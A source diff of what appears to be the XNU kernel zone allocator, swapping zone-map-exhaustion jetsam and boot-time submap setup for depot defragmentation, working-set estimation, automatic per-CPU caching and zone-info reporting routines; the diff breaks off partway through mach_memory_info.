-#define ZONE_MAP_JETSAM_LIMIT_DEFAULT 95
-
-/*
- * Trigger zone-map-exhaustion jetsams if the zone map is X% full, where X=zone_map_jetsam_limit.
- * Can be set via boot-arg "zone_map_jetsam_limit". Set to 95% by default.
- */
-TUNABLE_WRITEABLE(unsigned int, zone_map_jetsam_limit, "zone_map_jetsam_limit",
-    ZONE_MAP_JETSAM_LIMIT_DEFAULT);
-
 void
-get_zone_map_size(uint64_t *current_size, uint64_t *capacity)
+zone_gc_trim(void)
 {
-       vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed);
-       *current_size = ptoa_64(phys_pages);
-       *capacity = zone_phys_mapped_max;
+       zone_gc(ZONE_GC_TRIM);
 }
 
 void
-get_largest_zone_info(char *zone_name, size_t zone_name_len, uint64_t *zone_size)
+zone_gc_drain(void)
 {
-       zone_t largest_zone = zone_find_largest();
-
-       /*
-        * Append kalloc heap name to zone name (if zone is used by kalloc)
-        */
-       snprintf(zone_name, zone_name_len, "%s%s",
-           zone_heap_name(largest_zone), largest_zone->z_name);
-
-       *zone_size = zone_size_wired(largest_zone);
+       zone_gc(ZONE_GC_DRAIN);
 }
 
-boolean_t
-is_zone_map_nearing_exhaustion(void)
+static bool
+zone_defrag_needed(zone_t z)
 {
-       vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed);
-       return ptoa_64(phys_pages) > (zone_phys_mapped_max * zone_map_jetsam_limit) / 100;
-}
-
+       uint32_t recirc_size = z->z_recirc_cur * zc_mag_size();
 
-#define VMENTRY_TO_VMOBJECT_COMPARISON_RATIO 98
+       if (recirc_size <= z->z_chunk_elems / 2) {
+               return false;
+       }
+       return recirc_size * zc_defrag_ratio > z->z_elems_free_wss * 100;
+}
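+
+/*
+ * In other words, with zc_defrag_ratio read as a percentage, the depot is
+ * considered oversized once it holds more than half a chunk's worth of
+ * elements and more than (100 / zc_defrag_ratio) times the zone's
+ * free-element working set estimate.
+ */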
 
-/*
- * Tries to kill a single process if it can attribute one to the largest zone. If not, wakes up the memorystatus thread
- * to walk through the jetsam priority bands and kill processes.
+/*!
+ * @function zone_defrag_async
+ *
+ * @brief
+ * Resize the recirculation depot to match the working set size.
+ *
+ * @discussion
+ * When zones grow very large due to a spike in usage, and then some of those
+ * elements get freed, the elements in magazines in the recirculation depot
+ * are in no particular order.
+ *
+ * In order to control fragmentation, we need to detect "empty" pages so that
+ * they get onto the @c z_pageq_empty freelist, so that allocations re-pack
+ * naturally.
+ *
+ * This is done very gently, and never trims the depot below the working
+ * set estimate plus some slop.
  */
 static void
-kill_process_in_largest_zone(void)
+zone_defrag_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1)
 {
-       pid_t pid = -1;
-       zone_t largest_zone = zone_find_largest();
+       zone_foreach(z) {
+               struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags);
+               zone_magazine_t mag, tmp;
+               uint32_t freed = 0, goal = 0;
 
-       printf("zone_map_exhaustion: Zone mapped %lld of %lld, used %lld, map size %lld, capacity %lld [jetsam limit %d%%]\n",
-           ptoa_64(os_atomic_load(&zones_phys_page_mapped_count, relaxed)), ptoa_64(zone_phys_mapped_max),
-           ptoa_64(os_atomic_load(&zones_phys_page_count, relaxed)),
-           (uint64_t)zone_submaps_approx_size(),
-           (uint64_t)zone_range_size(&zone_info.zi_map_range),
-           zone_map_jetsam_limit);
-       printf("zone_map_exhaustion: Largest zone %s%s, size %lu\n", zone_heap_name(largest_zone),
-           largest_zone->z_name, (uintptr_t)zone_size_wired(largest_zone));
+               if (!z->collectable || !zone_defrag_needed(z)) {
+                       continue;
+               }
 
-       /*
-        * We want to make sure we don't call this function from userspace.
-        * Or we could end up trying to synchronously kill the process
-        * whose context we're in, causing the system to hang.
-        */
-       assert(current_task() == kernel_task);
+               zone_lock(z);
 
-       /*
-        * If vm_object_zone is the largest, check to see if the number of
-        * elements in vm_map_entry_zone is comparable.
-        *
-        * If so, consider vm_map_entry_zone as the largest. This lets us target
-        * a specific process to jetsam to quickly recover from the zone map
-        * bloat.
-        */
-       if (largest_zone == vm_object_zone) {
-               unsigned int vm_object_zone_count = zone_count_allocated(vm_object_zone);
-               unsigned int vm_map_entry_zone_count = zone_count_allocated(vm_map_entry_zone);
-               /* Is the VM map entries zone count >= 98% of the VM objects zone count? */
-               if (vm_map_entry_zone_count >= ((vm_object_zone_count * VMENTRY_TO_VMOBJECT_COMPARISON_RATIO) / 100)) {
-                       largest_zone = vm_map_entry_zone;
-                       printf("zone_map_exhaustion: Picking VM map entries as the zone to target, size %lu\n",
-                           (uintptr_t)zone_size_wired(largest_zone));
+               goal = z->z_elems_free_wss + z->z_chunk_elems / 2 +
+                   zc_mag_size() - 1;
+
+               while (z->z_recirc_cur * zc_mag_size() > goal) {
+                       if (freed >= zc_free_batch_size) {
+                               zone_unlock(z);
+                               thread_yield_to_preemption();
+                               zone_lock(z);
+                               freed = 0;
+                               /* we dropped the lock, needs to reassess */
+                               continue;
+                       }
+                       freed += zone_reclaim_recirc_magazine(z, &mags);
                }
-       }
 
-       /* TODO: Extend this to check for the largest process in other zones as well. */
-       if (largest_zone == vm_map_entry_zone) {
-               pid = find_largest_process_vm_map_entries();
-       } else {
-               printf("zone_map_exhaustion: Nothing to do for the largest zone [%s%s]. "
-                   "Waking up memorystatus thread.\n", zone_heap_name(largest_zone),
-                   largest_zone->z_name);
-       }
-       if (!memorystatus_kill_on_zone_map_exhaustion(pid)) {
-               printf("zone_map_exhaustion: Call to memorystatus failed, victim pid: %d\n", pid);
+               zone_unlock(z);
+
+               STAILQ_FOREACH_SAFE(mag, &mags, zm_link, tmp) {
+                       zone_magazine_free(mag);
+               }
        }
 }
 
-#pragma mark zalloc module init
-
-/*
- *     Initialize the "zone of zones" which uses fixed memory allocated
- *     earlier in memory initialization.  zone_bootstrap is called
- *     before zone_init.
- */
-__startup_func
 void
-zone_bootstrap(void)
+compute_zone_working_set_size(__unused void *param)
 {
-       /* Validate struct zone_page_metadata expectations */
-       if ((1U << ZONE_PAGECOUNT_BITS) <
-           atop(ZONE_MAX_ALLOC_SIZE) * sizeof(struct zone_page_metadata)) {
-               panic("ZONE_PAGECOUNT_BITS is not large enough to hold page counts");
-       }
+       uint32_t zc_auto = zc_auto_threshold;
+       bool kick_defrag = false;
 
-       /* Validate struct zone_packed_virtual_address expectations */
-       static_assert((intptr_t)VM_MIN_KERNEL_ADDRESS < 0, "the top bit must be 1");
-       if (VM_KERNEL_POINTER_SIGNIFICANT_BITS - PAGE_SHIFT > 31) {
-               panic("zone_pva_t can't pack a kernel page address in 31 bits");
+       /*
+        * Keep zone caching disabled until the first proc is made.
+        */
+       if (__improbable(zone_caching_disabled < 0)) {
+               return;
        }
 
-       zpercpu_early_count = ml_early_cpu_max_number() + 1;
-
-       /* Set up zone element poisoning */
-       zp_bootstrap();
+       zone_caching_disabled = vm_pool_low();
+#if ZALLOC_EARLY_GAPS
+       zone_cleanup_early_gaps_if_needed();
+#endif
 
-       random_bool_init(&zone_bool_gen);
+       if (os_mul_overflow(zc_auto, Z_CONTENTION_WMA_UNIT, &zc_auto)) {
+               zc_auto = 0;
+       }
 
-       /*
-        * the KASAN quarantine for kalloc doesn't understand heaps
-        * and trips the heap confusion panics. At the end of the day,
-        * all these security measures are double duty with KASAN.
-        *
-        * On 32bit kernels, these protections are just too expensive.
-        */
-#if !defined(__LP64__) || KASAN_ZALLOC
-       zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER;
-       zsecurity_options &= ~ZSECURITY_OPTIONS_SUBMAP_USER_DATA;
-       zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER_KEXT_KALLOC;
-#endif
+       zone_foreach(z) {
+               uint32_t wma;
+               bool needs_caching = false;
 
-       thread_call_setup(&call_async_alloc, zalloc_async, NULL);
+               if (z->z_self != z) {
+                       continue;
+               }
 
-#if CONFIG_ZCACHE
-       /* zcc_enable_for_zone_name=<zone>: enable per-cpu zone caching for <zone>. */
-       if (PE_parse_boot_arg_str("zcc_enable_for_zone_name", cache_zone_name, sizeof(cache_zone_name))) {
-               printf("zcache: caching enabled for zone %s\n", cache_zone_name);
-       }
-#endif /* CONFIG_ZCACHE */
-}
+               zone_lock(z);
 
-#if __LP64__
-#if CONFIG_EMBEDDED
-#define ZONE_MAP_VIRTUAL_SIZE_LP64      (32ULL * 1024ULL * 1024 * 1024)
-#else
-#define ZONE_MAP_VIRTUAL_SIZE_LP64      (128ULL * 1024ULL * 1024 * 1024)
-#endif
-#endif /* __LP64__ */
+               wma = z->z_elems_free_max - z->z_elems_free_min;
+               wma = (3 * wma + z->z_elems_free_wss) / 4;
+               z->z_elems_free_max = z->z_elems_free_min = z->z_elems_free;
+               z->z_elems_free_wss = wma;
 
-#define SINGLE_GUARD                    16384
-#define MULTI_GUARD                     (3 * SINGLE_GUARD)
+               if (!kick_defrag && zone_defrag_needed(z)) {
+                       kick_defrag = true;
+               }
 
-#if __LP64__
-static inline vm_offset_t
-zone_restricted_va_max(void)
-{
-       vm_offset_t compressor_max = VM_PACKING_MAX_PACKABLE(C_SLOT_PACKED_PTR);
-       vm_offset_t vm_page_max    = VM_PACKING_MAX_PACKABLE(VM_PAGE_PACKED_PTR);
+               /* fixed point decimal of contentions per second */
+               wma = z->z_contention_cur * Z_CONTENTION_WMA_UNIT /
+                   ZONE_WSS_UPDATE_PERIOD;
+               z->z_contention_cur = 0;
+               z->z_contention_wma = (3 * wma + z->z_contention_wma) / 4;
 
-       return trunc_page(MIN(compressor_max, vm_page_max));
-}
-#endif
+               /*
+                * If the zone seems to be very quiet,
+                * gently lower its cpu-local depot size.
+                */
+               if (z->z_pcpu_cache && wma < Z_CONTENTION_WMA_UNIT / 2 &&
+                   z->z_contention_wma < Z_CONTENTION_WMA_UNIT / 2) {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               if (zc->zc_depot_max > zc_mag_size()) {
+                                       zc->zc_depot_max--;
+                               }
+                       }
+               }
 
-__startup_func
-static void
-zone_tunables_fixup(void)
-{
-       if (zone_map_jetsam_limit == 0 || zone_map_jetsam_limit > 100) {
-               zone_map_jetsam_limit = ZONE_MAP_JETSAM_LIMIT_DEFAULT;
-       }
-}
-STARTUP(TUNABLES, STARTUP_RANK_MIDDLE, zone_tunables_fixup);
+               /*
+                * If the zone has been contending like crazy for two periods,
+                * and is eligible, maybe it's time to enable caching.
+                */
+               if (!z->z_nocaching && !z->z_pcpu_cache && !z->exhaustible &&
+                   zc_auto && z->z_contention_wma >= zc_auto && wma >= zc_auto) {
+                       needs_caching = true;
+               }
 
-__startup_func
-static vm_size_t
-zone_phys_size_max(void)
-{
-       mach_vm_size_t zsize;
-       vm_size_t zsizearg;
+               zone_unlock(z);
 
-       if (PE_parse_boot_argn("zsize", &zsizearg, sizeof(zsizearg))) {
-               zsize = zsizearg * (1024ULL * 1024);
-       } else {
-               zsize = sane_size >> 2;         /* Set target zone size as 1/4 of physical memory */
-#if defined(__LP64__)
-               zsize += zsize >> 1;
-#endif /* __LP64__ */
+               if (needs_caching) {
+                       zone_enable_caching(z);
+               }
        }
 
-       if (zsize < CONFIG_ZONE_MAP_MIN) {
-               zsize = CONFIG_ZONE_MAP_MIN;   /* Clamp to min */
-       }
-       if (zsize > sane_size >> 1) {
-               zsize = sane_size >> 1; /* Clamp to half of RAM max */
-       }
-       if (zsizearg == 0 && zsize > ZONE_MAP_MAX) {
-               /* if zsize boot-arg not present and zsize exceeds platform maximum, clip zsize */
-               vm_size_t orig_zsize = zsize;
-               zsize = ZONE_MAP_MAX;
-               printf("NOTE: zonemap size reduced from 0x%lx to 0x%lx\n",
-                   (uintptr_t)orig_zsize, (uintptr_t)zsize);
+       if (kick_defrag) {
+               thread_call_enter(&zone_defrag_callout);
        }
-
-       assert((vm_size_t) zsize == zsize);
-       return (vm_size_t)trunc_page(zsize);
 }
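+
+/*
+ * Every ZONE_WSS_UPDATE_PERIOD the span between the highest and lowest
+ * free-element counts observed is folded into z_elems_free_wss with a 3:1
+ * exponential moving average (wss' = (3 * span + wss) / 4); the contention
+ * counter is averaged the same way.  Those two estimates drive depot
+ * shrinking, the defrag callout, and automatic enabling of caching.
+ */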
 
-__startup_func
-static struct zone_map_range
-zone_init_allocate_va(vm_offset_t *submap_min, vm_size_t size, bool guard)
+#endif /* !ZALLOC_TEST */
+#pragma mark vm integration, MIG routines
+#if !ZALLOC_TEST
+
+/*
+ * Creates a vm_map_copy_t to return to the caller of mach_* MIG calls
+ * requesting zone information.
+ * Frees unused pages towards the end of the region, and zeroes out unused
+ * space on the last page.
+ */
+static vm_map_copy_t
+create_vm_map_copy(
+       vm_offset_t             start_addr,
+       vm_size_t               total_size,
+       vm_size_t               used_size)
 {
-       struct zone_map_range r;
-       kern_return_t kr;
+       kern_return_t   kr;
+       vm_offset_t             end_addr;
+       vm_size_t               free_size;
+       vm_map_copy_t   copy;
 
-       if (guard) {
-               vm_map_offset_t addr = *submap_min;
-               vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
+       if (used_size != total_size) {
+               end_addr = start_addr + used_size;
+               free_size = total_size - (round_page(end_addr) - start_addr);
 
-               vmk_flags.vmkf_permanent = TRUE;
-               kr = vm_map_enter(kernel_map, &addr, size, 0,
-                   VM_FLAGS_FIXED, vmk_flags, VM_KERN_MEMORY_ZONE, kernel_object,
-                   0, FALSE, VM_PROT_NONE, VM_PROT_NONE, VM_INHERIT_DEFAULT);
-               *submap_min = (vm_offset_t)addr;
-       } else {
-               kr = kernel_memory_allocate(kernel_map, submap_min, size,
-                   0, KMA_KOBJECT | KMA_PAGEABLE | KMA_VAONLY, VM_KERN_MEMORY_ZONE);
-       }
-       if (kr != KERN_SUCCESS) {
-               panic("zone_init_allocate_va(0x%lx:0x%zx) failed: %d",
-                   (uintptr_t)*submap_min, (size_t)size, kr);
+               if (free_size >= PAGE_SIZE) {
+                       kmem_free(ipc_kernel_map,
+                           round_page(end_addr), free_size);
+               }
+               bzero((char *) end_addr, round_page(end_addr) - end_addr);
        }
 
-       r.min_address = *submap_min;
-       *submap_min  += size;
-       r.max_address = *submap_min;
+       kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)start_addr,
+           (vm_map_size_t)used_size, TRUE, &copy);
+       assert(kr == KERN_SUCCESS);
 
-       return r;
+       return copy;
 }
 
-__startup_func
-static void
-zone_submap_init(
-       vm_offset_t *submap_min,
-       unsigned    idx,
-       uint64_t    zone_sub_map_numer,
-       uint64_t    *remaining_denom,
-       vm_offset_t *remaining_size,
-       vm_size_t   guard_size)
+static boolean_t
+get_zone_info(
+       zone_t                   z,
+       mach_zone_name_t        *zn,
+       mach_zone_info_t        *zi)
 {
-       vm_offset_t submap_start, submap_end;
-       vm_size_t submap_size;
-       vm_map_t  submap;
-       kern_return_t kr;
-
-       submap_size = trunc_page(zone_sub_map_numer * *remaining_size /
-           *remaining_denom);
-       submap_start = *submap_min;
-       submap_end = submap_start + submap_size;
+       struct zone zcopy;
+       vm_size_t cached = 0;
 
-#if defined(__LP64__)
-       if (idx == Z_SUBMAP_IDX_VA_RESTRICTED_MAP) {
-               vm_offset_t restricted_va_max = zone_restricted_va_max();
-               if (submap_end > restricted_va_max) {
-#if DEBUG || DEVELOPMENT
-                       printf("zone_init: submap[%d] clipped to %zdM of %zdM\n", idx,
-                           (size_t)(restricted_va_max - submap_start) >> 20,
-                           (size_t)submap_size >> 20);
-#endif /* DEBUG || DEVELOPMENT */
-                       guard_size += submap_end - restricted_va_max;
-                       *remaining_size -= submap_end - restricted_va_max;
-                       submap_end  = restricted_va_max;
-                       submap_size = restricted_va_max - submap_start;
+       assert(z != ZONE_NULL);
+       zone_lock(z);
+       if (!z->z_self) {
+               zone_unlock(z);
+               return FALSE;
+       }
+       zcopy = *z;
+       if (z->z_pcpu_cache) {
+               zpercpu_foreach(zc, z->z_pcpu_cache) {
+                       cached += zc->zc_alloc_cur + zc->zc_free_cur;
+                       cached += zc->zc_depot_cur * zc_mag_size();
                }
-
-               vm_packing_verify_range("vm_compressor",
-                   submap_start, submap_end, VM_PACKING_PARAMS(C_SLOT_PACKED_PTR));
-               vm_packing_verify_range("vm_page",
-                   submap_start, submap_end, VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR));
        }
-#endif /* defined(__LP64__) */
+       zone_unlock(z);
 
-       vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
-       vmk_flags.vmkf_permanent = TRUE;
-       kr = kmem_suballoc(kernel_map, submap_min, submap_size,
-           FALSE, VM_FLAGS_FIXED, vmk_flags,
-           VM_KERN_MEMORY_ZONE, &submap);
-       if (kr != KERN_SUCCESS) {
-               panic("kmem_suballoc(kernel_map[%d] %p:%p) failed: %d",
-                   idx, (void *)submap_start, (void *)submap_end, kr);
-       }
+       if (zn != NULL) {
+               /*
+                * Append kalloc heap name to zone name (if zone is used by kalloc)
+                */
+               char temp_zone_name[MAX_ZONE_NAME] = "";
+               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
+                   zone_heap_name(z), z->z_name);
 
-#if DEBUG || DEVELOPMENT
-       printf("zone_init: submap[%d] %p:%p (%zuM)\n",
-           idx, (void *)submap_start, (void *)submap_end,
-           (size_t)submap_size >> 20);
-#endif /* DEBUG || DEVELOPMENT */
+               /* assuming here the name data is static */
+               (void) __nosan_strlcpy(zn->mzn_name, temp_zone_name,
+                   strlen(temp_zone_name) + 1);
+       }
 
-       zone_submaps[idx] = submap;
-       *submap_min       = submap_end;
-       *remaining_size  -= submap_size;
-       *remaining_denom -= zone_sub_map_numer;
+       if (zi != NULL) {
+               *zi = (mach_zone_info_t) {
+                       .mzi_count = zone_count_allocated(&zcopy) - cached,
+                       .mzi_cur_size = ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_cur)),
+                       // max_size for zprint is now high-watermark of pages used
+                       .mzi_max_size = ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_hwm)),
+                       .mzi_elem_size = zone_scale_for_percpu(&zcopy, zcopy.z_elem_size),
+                       .mzi_alloc_size = ptoa_64(zcopy.z_chunk_pages),
+                       .mzi_exhaustible = (uint64_t)zcopy.exhaustible,
+               };
+               zpercpu_foreach(zs, zcopy.z_stats) {
+                       zi->mzi_sum_size += zs->zs_mem_allocated;
+               }
+               if (zcopy.collectable) {
+                       SET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable,
+                           ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_empty)));
+                       SET_MZI_COLLECTABLE_FLAG(zi->mzi_collectable, TRUE);
+               }
+       }
 
-       zone_init_allocate_va(submap_min, guard_size, true);
+       return TRUE;
 }
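/*
 * Worked example for the cache adjustment above (numbers hypothetical):
 * with zc_mag_size() == 16, a CPU whose cache holds zc_alloc_cur == 3,
 * zc_free_cur == 5 and zc_depot_cur == 2 magazines contributes
 * 3 + 5 + 2 * 16 = 40 elements to `cached`, so mzi_count reports 40
 * fewer live elements for that CPU than zone_count_allocated() alone
 * would.
 */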
 
-/* Global initialization of Zone Allocator.
- * Runs after zone_bootstrap.
- */
-__startup_func
-static void
-zone_init(void)
+kern_return_t
+task_zone_info(
+       __unused task_t                                 task,
+       __unused mach_zone_name_array_t *namesp,
+       __unused mach_msg_type_number_t *namesCntp,
+       __unused task_zone_info_array_t *infop,
+       __unused mach_msg_type_number_t *infoCntp)
 {
-       vm_size_t       zone_meta_size;
-       vm_size_t       zone_map_size;
-       vm_size_t       remaining_size;
-       vm_offset_t     submap_min = 0;
-
-       if (ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) {
-               zone_last_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP;
-       } else {
-               zone_last_submap_idx = Z_SUBMAP_IDX_GENERAL_MAP;
-       }
-       zone_phys_mapped_max  = zone_phys_size_max();
+       return KERN_FAILURE;
+}
 
-#if __LP64__
-       zone_map_size = ZONE_MAP_VIRTUAL_SIZE_LP64;
-#else
-       zone_map_size = zone_phys_mapped_max;
-#endif
-       zone_meta_size = round_page(atop(zone_map_size) *
-           sizeof(struct zone_page_metadata));
+kern_return_t
+mach_zone_info(
+       host_priv_t             host,
+       mach_zone_name_array_t  *namesp,
+       mach_msg_type_number_t  *namesCntp,
+       mach_zone_info_array_t  *infop,
+       mach_msg_type_number_t  *infoCntp)
+{
+       return mach_memory_info(host, namesp, namesCntp, infop, infoCntp, NULL, NULL);
+}
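/*
 * Illustrative sketch (not part of this change): how a privileged
 * user-space tool might drive the routine above.  This assumes the
 * MIG-generated prototype and mach_debug zone-info types are visible to
 * the caller (e.g. via <mach/mach.h> plus <stdio.h> for printf), and
 * that the kernel permits the query (host port requirements and the
 * CONFIG_DEBUGGER_FOR_ZONE_INFO gate below still apply).
 */
#if 0   /* illustration only, user-space code */
static void
print_zone_counts_sketch(void)
{
	mach_zone_name_array_t names = NULL;
	mach_zone_info_array_t info = NULL;
	mach_msg_type_number_t name_cnt = 0, info_cnt = 0;

	if (mach_zone_info(mach_host_self(), &names, &name_cnt,
	    &info, &info_cnt) != KERN_SUCCESS) {
		return;
	}
	for (mach_msg_type_number_t i = 0; i < info_cnt && i < name_cnt; i++) {
		printf("%s: %llu elements\n", names[i].mzn_name,
		    (unsigned long long)info[i].mzi_count);
	}
	/* both out-of-line arrays belong to the caller */
	vm_deallocate(mach_task_self(), (vm_address_t)names,
	    name_cnt * sizeof(*names));
	vm_deallocate(mach_task_self(), (vm_address_t)info,
	    info_cnt * sizeof(*info));
}
#endif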
 
-       /*
-        * Zone "map" setup:
-        *
-        * [  VA_RESTRICTED  ] <-- LP64 only
-        * [  SINGLE_GUARD   ] <-- LP64 only
-        * [  meta           ]
-        * [  SINGLE_GUARD   ]
-        * [  map<i>         ] \ for each extra map
-        * [  MULTI_GUARD    ] /
-        */
-       remaining_size = zone_map_size;
-#if defined(__LP64__)
-       remaining_size -= SINGLE_GUARD;
-#endif
-       remaining_size -= zone_meta_size + SINGLE_GUARD;
-       remaining_size -= MULTI_GUARD * (zone_last_submap_idx -
-           Z_SUBMAP_IDX_GENERAL_MAP + 1);
 
-#if VM_MAX_TAG_ZONES
-       if (zone_tagging_on) {
-               zone_tagging_init(zone_map_size);
-       }
-#endif
+kern_return_t
+mach_memory_info(
+       host_priv_t             host,
+       mach_zone_name_array_t  *namesp,
+       mach_msg_type_number_t  *namesCntp,
+       mach_zone_info_array_t  *infop,
+       mach_msg_type_number_t  *infoCntp,
+       mach_memory_info_array_t *memoryInfop,
+       mach_msg_type_number_t   *memoryInfoCntp)
+{
+       mach_zone_name_t        *names;
+       vm_offset_t             names_addr;
+       vm_size_t               names_size;
 
-       uint64_t remaining_denom = 0;
-       uint64_t zone_sub_map_numer[Z_SUBMAP_IDX_COUNT] = {
-#ifdef __LP64__
-               [Z_SUBMAP_IDX_VA_RESTRICTED_MAP] = 20,
-#endif /* defined(__LP64__) */
-               [Z_SUBMAP_IDX_GENERAL_MAP]       = 40,
-               [Z_SUBMAP_IDX_BAG_OF_BYTES_MAP]  = 40,
-       };
+       mach_zone_info_t        *info;
+       vm_offset_t             info_addr;
+       vm_size_t               info_size;
 
-       for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) {
-#if DEBUG || DEVELOPMENT
-               char submap_name[MAX_SUBMAP_NAME];
-               snprintf(submap_name, MAX_SUBMAP_NAME, "submap%d", idx);
-               PE_parse_boot_argn(submap_name, &zone_sub_map_numer[idx], sizeof(uint64_t));
-#endif
-               remaining_denom += zone_sub_map_numer[idx];
-       }
+       mach_memory_info_t      *memory_info;
+       vm_offset_t             memory_info_addr;
+       vm_size_t               memory_info_size;
+       vm_size_t               memory_info_vmsize;
+       unsigned int            num_info;
 
-       /*
-        * And now allocate the various pieces of VA and submaps.
-        *
-        * Make a first allocation of contiguous VA, that we'll deallocate,
-        * and we'll carve-out memory in that range again linearly.
-        * The kernel is still single-threaded at this stage.
-        */
+       unsigned int            max_zones, used_zones, i;
+       mach_zone_name_t        *zn;
+       mach_zone_info_t        *zi;
+       kern_return_t           kr;
 
-       struct zone_map_range *map_range = &zone_info.zi_map_range;
+       uint64_t                zones_collectable_bytes = 0;
 
-       *map_range = zone_init_allocate_va(&submap_min, zone_map_size, false);
-       submap_min = map_range->min_address;
-       kmem_free(kernel_map, submap_min, zone_map_size);
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
+       }
+#if CONFIG_DEBUGGER_FOR_ZONE_INFO
+       if (!PE_i_can_has_debugger(NULL)) {
+               return KERN_INVALID_HOST;
+       }
+#endif
 
-#if defined(__LP64__)
        /*
-        * Allocate `Z_SUBMAP_IDX_VA_RESTRICTED_MAP` first because its VA range
-        * can't go beyond RESTRICTED_VA_MAX for the vm_page_t packing to work.
+        *      We assume that zones aren't freed once allocated.
+        *      We won't pick up any zones that are allocated later.
         */
-       zone_submap_init(&submap_min, Z_SUBMAP_IDX_VA_RESTRICTED_MAP,
-           zone_sub_map_numer[Z_SUBMAP_IDX_VA_RESTRICTED_MAP], &remaining_denom,
-           &remaining_size, SINGLE_GUARD);
-#endif /* defined(__LP64__) */
 
-       /*
-        * Allocate metadata array
-        */
-       zone_info.zi_meta_range =
-           zone_init_allocate_va(&submap_min, zone_meta_size, true);
-       zone_init_allocate_va(&submap_min, SINGLE_GUARD, true);
+       max_zones = os_atomic_load(&num_zones, relaxed);
 
-       zone_info.zi_array_base =
-           (struct zone_page_metadata *)zone_info.zi_meta_range.min_address -
-           zone_pva_from_addr(map_range->min_address).packed_address;
+       names_size = round_page(max_zones * sizeof *names);
+       kr = kmem_alloc_pageable(ipc_kernel_map,
+           &names_addr, names_size, VM_KERN_MEMORY_IPC);
+       if (kr != KERN_SUCCESS) {
+               return kr;
+       }
+       names = (mach_zone_name_t *) names_addr;
 
-       /*
-        * Allocate other submaps
-        */
-       for (unsigned idx = Z_SUBMAP_IDX_GENERAL_MAP; idx <= zone_last_submap_idx; idx++) {
-               zone_submap_init(&submap_min, idx, zone_sub_map_numer[idx],
-                   &remaining_denom, &remaining_size, MULTI_GUARD);
+       info_size = round_page(max_zones * sizeof *info);
+       kr = kmem_alloc_pageable(ipc_kernel_map,
+           &info_addr, info_size, VM_KERN_MEMORY_IPC);
+       if (kr != KERN_SUCCESS) {
+               kmem_free(ipc_kernel_map,
+                   names_addr, names_size);
+               return kr;
        }
+       info = (mach_zone_info_t *) info_addr;
 
-       vm_map_t general_map = zone_submaps[Z_SUBMAP_IDX_GENERAL_MAP];
-       zone_info.zi_general_range.min_address = vm_map_min(general_map);
-       zone_info.zi_general_range.max_address = vm_map_max(general_map);
+       zn = &names[0];
+       zi = &info[0];
 
-       assert(submap_min == map_range->max_address);
+       used_zones = max_zones;
+       for (i = 0; i < max_zones; i++) {
+               if (!get_zone_info(&(zone_array[i]), zn, zi)) {
+                       used_zones--;
+                       continue;
+               }
+               zones_collectable_bytes += GET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable);
+               zn++;
+               zi++;
+       }
 
-#if CONFIG_GZALLOC
-       gzalloc_init(zone_map_size);
-#endif
+       *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, used_zones * sizeof *names);
+       *namesCntp = used_zones;
 
-       zone_create_flags_t kma_flags = ZC_NOCACHING |
-           ZC_NOGC | ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT |
-           ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE;
+       *infop = (mach_zone_info_t *) create_vm_map_copy(info_addr, info_size, used_zones * sizeof *info);
+       *infoCntp = used_zones;
 
-       (void)zone_create_ext("vm.permanent", 1, kma_flags,
-           ZONE_ID_PERMANENT, ^(zone_t z){
-               z->permanent = true;
-               z->z_elem_size = 1;
-               z->pcpu_elem_size = 1;
-#if defined(__LP64__)
-               z->submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED_MAP;
-#endif
-       });
-       (void)zone_create_ext("vm.permanent.percpu", 1, kma_flags | ZC_PERCPU,
-           ZONE_ID_PERCPU_PERMANENT, ^(zone_t z){
-               z->permanent = true;
-               z->z_elem_size = 1;
-               z->pcpu_elem_size = zpercpu_count();
-#if defined(__LP64__)
-               z->submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED_MAP;
-#endif
-       });
+       num_info = 0;
+       memory_info_addr = 0;
 
-       /*
-        * Now fix the zones that are missing their zone stats
-        * we don't really know if zfree()s happened so our stats
-        * are slightly off for early boot. ¯\_(ツ)_/¯
-        */
-       zone_index_foreach(idx) {
-               zone_t tz = &zone_array[idx];
+       if (memoryInfop && memoryInfoCntp) {
+               vm_map_copy_t           copy;
+               num_info = vm_page_diagnose_estimate();
+               memory_info_size = num_info * sizeof(*memory_info);
+               memory_info_vmsize = round_page(memory_info_size);
+               kr = kmem_alloc_pageable(ipc_kernel_map,
+                   &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_IPC);
+               if (kr != KERN_SUCCESS) {
+                       return kr;
+               }
 
-               if (tz->z_self) {
-                       zone_stats_t zs = zalloc_percpu_permanent_type(struct zone_stats);
+               kr = vm_map_wire_kernel(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize,
+                   VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE);
+               assert(kr == KERN_SUCCESS);
 
-                       zpercpu_get_cpu(zs, 0)->zs_mem_allocated +=
-                           (tz->countavail - tz->countfree) *
-                           zone_elem_size(tz);
-                       assert(tz->z_stats == NULL);
-                       tz->z_stats = zs;
-#if ZONE_ENABLE_LOGGING
-                       if (tz->zone_logging && !tz->zlog_btlog) {
-                               zone_enable_logging(tz);
-                       }
-#endif
-               }
